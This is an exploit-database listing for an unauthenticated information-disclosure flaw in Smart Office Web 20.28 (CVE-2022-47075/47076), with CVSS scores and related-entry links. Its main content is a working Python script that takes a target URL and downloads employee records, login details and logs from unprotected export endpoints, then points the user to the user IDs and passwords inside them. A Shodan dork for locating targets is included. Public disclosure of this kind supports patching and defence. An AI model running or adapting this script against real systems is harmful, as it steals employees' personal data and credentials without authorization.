Lucene search
Tejas PingulkarEDB-ID:51539HistoryJun 22, 2023 - 12:00 a.m.
Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
2023-06-2200:00:00
Tejas Pingulkar
www.exploit-db.com
165
smart office
information disclosure
remote
unauthenticated
idor
cve-2022-47075
cve-2022-47076
cvss 7.5
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.014 Low
EPSS
Percentile
86.5%
# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
# Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office"
# Date: 09/Dec/2022
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://smartofficepayroll.com/
# Software Link: https://smartofficepayroll.com/downloads
# Version: Smart Office Web 20.28 and before
# CVE Number : CVE-2022-47075 and CVE-2022-47076
# CVSS : 7.5 (High)
# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/
# Vulnerability Description:
# Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails.
import wget
import os
from colorama import Fore, Style
def download_file(url, filename):
wget.download(url, filename)
# Disclaimer
print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.")
agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")
if agree != "1":
print("You have chosen not to agree. Exiting the script.")
exit()
# Print name in red
name = "Exploit by Tejas Nitin Pingulkar"
print(Fore.RED + name)
print(Style.RESET_ALL) # Reset color
website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")
target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")
folder_name = input("Enter the folder name to save the files: ")
# Create the folder if it doesn't exist
if not os.path.exists(folder_name):
os.makedirs(folder_name)
urls_filenames = []
if target_version == "1":
urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))
else:
urls_filenames.extend([
(website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
(website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),
(website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),
(website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")
])
print("CVE-2022-47076: Obtain user ID and password from downloaded source")
for url, filename in urls_filenames:
download_file(url, os.path.join(folder_name, filename))
# Print "for more such interesting exploits, visit cvewalkthrough.com" in red
print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")
print(Style.RESET_ALL) # Reset colorRelated
zdt
zdt
packetstorm
packetstorm
nvd
nvd
CVE-2022-47075
2023-02-28 23:15:11
CVE-2022-47076
2023-02-28 23:15:11
cve
cve
CVE-2022-47076
2023-02-28 23:15:11
CVE-2022-47075
2023-02-28 23:15:11
cvelist
cvelist
CVE-2022-47076
2023-02-28 00:00:00
CVE-2022-47075
2023-02-28 00:00:00
prion
prion
Design/Logic Flaw
2023-02-28 23:15:00
Design/Logic Flaw
2023-02-28 23:15:00
nuclei
nuclei
Smart Office Web 20.28 - Information Disclosure
2023-10-17 07:20:28
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.014 Low
EPSS
Percentile
86.5%
Related for EDB-ID:51539